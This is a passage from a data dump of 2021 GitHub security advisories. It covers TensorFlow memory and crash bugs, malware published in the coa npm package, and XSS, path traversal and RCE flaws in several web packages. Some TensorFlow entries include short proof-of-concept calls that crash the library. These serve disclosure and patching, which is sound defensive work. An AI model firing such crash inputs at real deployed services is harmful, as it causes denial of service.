tf.raw_ops.SparseCountSparseOutput( + indices=[1], + values=[[1]], + dense_shape=[10], + weights=[], + binary_output= True) + +func() +``` + +The function fails to check that the first input (i.e., `indices`) has rank 2: + +```cc + auto rank = c->Dim(c->input(0), 1); +``` + +### Patches +We have patched the issue in GitHub commit [701cfaca222a82afbeeb17496bd718baa65a67d2](https://github.com/tensorflow/tensorflow/commit/701cfaca222a82afbeeb17496bd718baa65a67d2). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m342-ff57-4jcc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41210'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/701cfaca222a82afbeeb17496bd718baa65a67d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:34:11Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}" +1.4.0,GHSA-frcx-xc72-c4v4,2021-11-30T21:55:50Z,2021-11-29T18:09:08Z,2021-11-30T21:33:03Z,['CVE-2021-44150'],Use of Sha-1 in tusdotnet,"# Withdrawn + +After reviewing this CVE, we have withdrawn this advisory due to it not having actual security impact. + +# Original Advisory + +The client in tusdotnet through 2.5.0 relies on SHA-1 to prevent spoofing of file content.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'tusdotnet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44150'}, {'type': 'WEB', 'url': 'https://github.com/github/advisory-database/issues/2324'}, {'type': 'WEB', 'url': 'https://github.com/tusdotnet/tusdotnet/issues/157'}, {'type': 'PACKAGE', 'url': 'https://github.com/tusdotnet/tusdotnet'}, {'type': 'WEB', 'url': 'https://shattered.io/'}]","{'cwe_ids': ['CWE-327'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-23T19:18:34Z', 'nvd_published_at': '2021-11-22T22:15:00Z'}" +1.4.0,GHSA-73qr-pfmq-6rp8,2022-09-07T22:16:29Z,2021-11-04T16:22:28Z,,[],Embedded malware in coa,"The npm package `coa` had versions published with malicious code. Users of affected versions (2.0.3 and above) should downgrade to 2.0.2 as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/veged/coa/issues/99) for details as they unfold. +Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",[],"[{'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['2.0.3']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['2.0.4']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['2.1.1']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['2.1.3']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['3.0.1']}, {'package': {'ecosystem': 'npm', 'name': 'coa'}, 'versions': ['3.1.3']}]","[{'type': 'WEB', 'url': 'https://github.com/veged/coa/issues/99'}, {'type': 'PACKAGE', 'url': 'https://github.com/veged/coa'}, {'type': 'WEB', 'url': 'https://therecord.media/malware-found-in-coa-and-rc-two-npm-packages-with-23m-weekly-downloads/'}, {'type': 'WEB', 'url': 'https://www.virustotal.com/gui/file/26451f7f6fe297adf6738295b1dcc70f7678434ef21d8b6aad5ec00beb8a72cf?nocache=1'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:19:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-j4mv-2rv7-v2j9,2022-07-13T19:06:19Z,2021-11-23T18:18:07Z,,['CVE-2021-22966'],Improper Privilege Management in Concrete CMS ,"Privilege escalation from Editor to Admin using Groups in Concrete CMS versions 8.5.6 and below. If a group is granted ""view"" permissions on the bulkupdate page, then users in that group can escalate to being an administrator with a specially crafted curl. Fixed by adding a check for group permissions before allowing a group to be moved.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22966'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1362747'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:31:34Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}" +1.4.0,GHSA-9j9m-8wjc-ff96,2022-08-22T22:01:24Z,2021-11-10T17:02:44Z,,['CVE-2021-25979'], Apostrophe CMS Insufficient Session Expiration vulnerability,"Apostrophe CMS versions between 2.63.0 to 3.3.1 affected by an insufficient session expiration vulnerability, which allows unauthenticated remote attackers to hijack recently logged-in users' sessions. As a mitigation for older releases the user account in question can be archived (3.x) or moved to the trash (2.x and earlier) which does disable the existing session.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'apostrophe'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.63.0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25979'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/apostrophe/commit/c211b211f9f4303a77a307cf41aac9b4ef8d2c7c'}, {'type': 'PACKAGE', 'url': 'https://github.com/apostrophecms/apostrophe'}]","{'cwe_ids': ['CWE-613'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-09T21:01:19Z', 'nvd_published_at': '2021-11-08T15:15:00Z'}" +1.4.0,GHSA-6g47-63mv-qpgh,2021-11-04T17:01:59Z,2021-11-08T17:55:48Z,,['CVE-2021-23624'],Prototype Pollution in dotty,This affects the package dotty before 0.1.2. A type confusion vulnerability can lead to a bypass of CVE-2021-25912 when the user-provided keys used in the path parameter are arrays.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'dotty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23624'}, {'type': 'WEB', 'url': 'https://github.com/deoxxa/dotty/commit/88f61860dcc274a07a263c32cbe9d44c24ef02d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/deoxxa/dotty'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOTTY-1577292'}]","{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:01:59Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}" +1.4.0,GHSA-8c5p-4362-9333,2021-11-08T21:30:39Z,2021-11-10T16:48:15Z,,['CVE-2021-3924'],Path traversal in grav,grav is vulnerable to Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.7.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3924'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/8f9c417c04b89dc8d2de60b95e7696821b2826ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7ca13522-d0c9-4eff-a7dd-6fd1a7f205a2'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:30:39Z', 'nvd_published_at': '2021-11-05T15:15:00Z'}" +1.4.0,GHSA-j86v-p27c-73fm,2021-11-08T22:49:15Z,2021-11-10T19:17:43Z,,['CVE-2021-41201'],Unitialized access in `EinsumHelper::ParseEquation`,"### Impact +During execution, [`EinsumHelper::ParseEquation()`](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/kernels/linalg/einsum_op_impl.h#L126-L181) is supposed to set the flags in `input_has_ellipsis` vector and `*output_has_ellipsis` boolean to indicate whether there is ellipsis in the corresponding inputs and output. + +However, the code only changes these flags to `true` and never assigns `false`. + +```cc +for (int i = 0; i < num_inputs; ++i) { + input_label_counts->at(i).resize(num_labels); + for (const int label : input_labels->at(i)) { + if (label != kEllipsisLabel) + input_label_counts->at(i)[label] += 1; + else + input_has_ellipsis->at(i) = true; + } +} +output_label_counts->resize(num_labels); +for (const int label : *output_labels) { + if (label != kEllipsisLabel) + output_label_counts->at(label) += 1; + else + *output_has_ellipsis = true; +} +``` + +This results in unitialized variable access if callers assume that `EinsumHelper::ParseEquation()` always sets these flags. + + +### Patches +We have patched the issue in GitHub commit [f09caa532b6e1ac8d2aa61b7832c78c5b79300c6](https://github.com/tensorflow/tensorflow/commit/f09caa532b6e1ac8d2aa61b7832c78c5b79300c6). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j86v-p27c-73fm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41201'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f09caa532b6e1ac8d2aa61b7832c78c5b79300c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:49:15Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}" +1.4.0,GHSA-pfj7-2qfw-vwgm,2022-09-14T20:37:56Z,2021-11-30T22:20:43Z,,['CVE-2021-43788'],NodeBB vulnerable to path traversal in translator module,"### Impact +Prior to v1.18.5, a path traversal vulnerability was present that allowed users to access JSON files outside of the expected `languages/` directory. + +### Patches +The vulnerability has been patched as of v1.18.5. + +### Workarounds +Cherry-pick commit hash `c8b2fc46dc698db687379106b3f01c71b80f495f` to receive this patch in lieu of a full upgrade. + +### For more information +If you have any questions or comments about this advisory: +* Email us at [security@nodebb.org](mailto:security@nodebb.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodebb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.4'}, {'fixed': '1.18.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/security/advisories/GHSA-pfj7-2qfw-vwgm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43788'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/commit/c8b2fc46dc698db687379106b3f01c71b80f495f'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/nodebb-remote-code-execution-with-one-shot/'}, {'type': 'PACKAGE', 'url': 'https://github.com/NodeBB/NodeBB'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/releases/tag/v1.18.5'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:35:14Z', 'nvd_published_at': '2021-11-29T20:15:00Z'}" +1.4.0,GHSA-5m8f-chrv-7rw5,2023-09-18T19:45:26Z,2021-11-23T18:04:47Z,,['CVE-2021-43668'],Denial of Service in Go-Ethereum,"Go-Ethereum 1.10.9 nodes crash (denial of service) after receiving a serial of messages and cannot be recovered. They will crash with ""runtime error: invalid memory address or nil pointer dereference"" and arise a SEGV signal.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.10.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43668'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/issues/23866'}, {'type': 'WEB', 'url': 'https://github.com/syndtr/goleveldb/issues/373'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-19T13:19:43Z', 'nvd_published_at': '2021-11-18T16:15:00Z'}" +1.4.0,GHSA-q3j3-w37x-hq2q,2021-11-25T00:18:27Z,2021-11-24T20:04:25Z,,['CVE-2021-41267'],Webcache Poisoning in symfony/http-kernel,"Description +----------- + +When a Symfony application is running behind a proxy or a load-balancer, you can tell Symfony to look for the `X-Forwarded-*` HTTP headers. HTTP headers that are not part of the ""trusted_headers"" allowed list are ignored and protect you from ""Cache poisoning"" attacks. + +In Symfony 5.2, we've added support for the `X-Forwarded-Prefix` header, but this header was accessible in sub-requests, even if it was not part of the ""trusted_headers"" allowed list. An attacker could leverage this opportunity to forge requests containing a `X-Forwarded-Prefix` HTTP header, leading to a web cache poisoning issue. + +Resolution +---------- + +Symfony now ensures that the `X-Forwarded-Prefix` HTTP header is not forwarded to sub-requests when it is not trusted. + +The patch for this issue is available [here](https://github.com/symfony/symfony/commit/95dcf51682029e89450aee86267e3d553aa7c487) for branch 5.3. + +Credits +------- + +We would like to thank Soner Sayakci for reporting the issue and Jérémy Derussé for fixing the issue. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.3.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-q3j3-w37x-hq2q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41267'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/pull/44243'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/95dcf51682029e89450aee86267e3d553aa7c487'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/releases/tag/v5.3.12'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T19:58:05Z', 'nvd_published_at': '2021-11-24T19:15:00Z'}" +1.4.0,GHSA-w4v7-hwx7-9929,2021-11-08T17:49:56Z,2021-11-08T17:50:10Z,,['CVE-2021-23784'],Cross-site Scripting in tempura,"This affects the package tempura before 0.4.0. If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tempura'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23784'}, {'type': 'WEB', 'url': 'https://github.com/lukeed/tempura/commit/58a5c3671e2f36b26810e77ead9e0dd471902f9b'}, {'type': 'PACKAGE', 'url': 'https://github.com/lukeed/tempura'}, {'type': 'WEB', 'url': 'https://github.com/lukeed/tempura/releases/tag/v0.4.0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TEMPURA-1569633'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:59:09Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}" +1.4.0,GHSA-p9m8-27x8-rg87,2021-11-15T22:23:17Z,2021-11-15T23:27:11Z,,['CVE-2021-41269'],Critical vulnerability found in cron-utils,"### Impact +A Template Injection was identified in cron-utils enabling attackers to inject arbitrary Java EL expressions, leading to unauthenticated Remote Code Execution (RCE) vulnerability. Versions up to 9.1.2 are susceptible to this vulnerability. Please note, that only projects using the @Cron annotation to validate untrusted Cron expressions are affected. + +### Patches +The issue was patched and a new version was released. Please upgrade to version 9.1.6. + +### Workarounds +There are no known workarounds up to this moment. + +### References +A description of the issue is provided in [issue 461](https://github.com/jmrozanec/cron-utils/issues/461) + +### For more information +If you have any questions or comments about this advisory: + +Open an issue in the [cron-utils Github repository](https://github.com/jmrozanec/cron-utils)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.cronutils:cron-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.1.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/security/advisories/GHSA-p9m8-27x8-rg87'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41269'}, {'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/issues/461'}, {'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/commit/cfd2880f80e62ea74b92fa83474c2aabdb9899da'}, {'type': 'WEB', 'url': 'https://github.com/jmrozanec/cron-utils/commit/d6707503ec2f20947f79e38f861dba93b39df9da'}, {'type': 'PACKAGE', 'url': 'https://github.com/jmrozanec/cron-utils'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:23:17Z', 'nvd_published_at': '2021-11-15T21:15:00Z'}" +1.4.0,GHSA-g5gj-9ggf-9vmq,2021-11-10T18:18:55Z,2021-11-10T20:38:53Z,,['CVE-2021-3908'],Infinite certificate chain depth results in OctoRPKI running forever,"OctoRPKI does not limit the depth of a certificate chain, allowing for a CA to create children in an ad-hoc fashion, thereby making tree traversal never end. + +## Patches + +## For more information +If you have any questions or comments about this advisory email us at security@cloudflare.com +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki/cmd/octorpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-g5gj-9ggf-9vmq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3908'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-400', 'CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:18:55Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}" +1.4.0,GHSA-5jxc-hmqf-3f73,2021-11-01T14:06:13Z,2021-11-01T19:17:31Z,,['CVE-2021-3904'],Cross-Site Scripting in grav,grav prior to version 1.7.24 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3904'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/afc69a3229bb6fe120b2c1ea27bc6f196ed7284d'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/b1182515-d911-4da9-b4f7-b4c341a62a8d'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-29T13:48:26Z', 'nvd_published_at': '2021-10-27T22:15:00Z'}" +1.4.0,GHSA-cq76-mxrc-vchh,2021-11-08T22:57:24Z,2021-11-10T19:36:50Z,,['CVE-2021-41195'],Crash in `tf.math.segment_*` operations,"### Impact +The implementation of `tf.math.segment_*` operations results in a `CHECK`-fail related abort (and denial of service) if a segment id in `segment_ids` is large. + +```python +import tensorflow as tf + +tf.math.segment_max(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) +tf.math.segment_min(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) +tf.math.segment_mean(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) +tf.math.segment_sum(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) +tf.math.segment_prod(data=np.ones((1,10,1)), segment_ids=[1676240524292489355]) +``` + +This is similar to [CVE-2021-29584](https://github.com/tensorflow/tensorflow/blob/3a74f0307236fe206b046689c4d76f57c9b74eee/tensorflow/security/advisory/tfsa-2021-071.md) (and similar other reported vulnerabilities in TensorFlow, localized to specific APIs): the [implementation](https://github.com/tensorflow/tensorflow/blob/dae66e518c88de9c11718cd0f8f40a0b666a90a0/tensorflow/core/kernels/segment_reduction_ops_impl.h) (both on CPU and GPU) computes the output shape using [`AddDim`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/framework/tensor_shape.cc#L395-L408). However, if the number of elements in the tensor overflows an `int64_t` value, `AddDim` results in a `CHECK` failure which provokes a `std::abort`. Instead, code should use [`AddDimWithStatus`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/framework/tensor_shape.cc#L410-L440). + + +### Patches +We have patched the issue in GitHub commit [e9c81c1e1a9cd8dd31f4e83676cab61b60658429](https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429) (merging [#51733](https://github.com/tensorflow/tensorflow/pull/51733)). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46888).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': 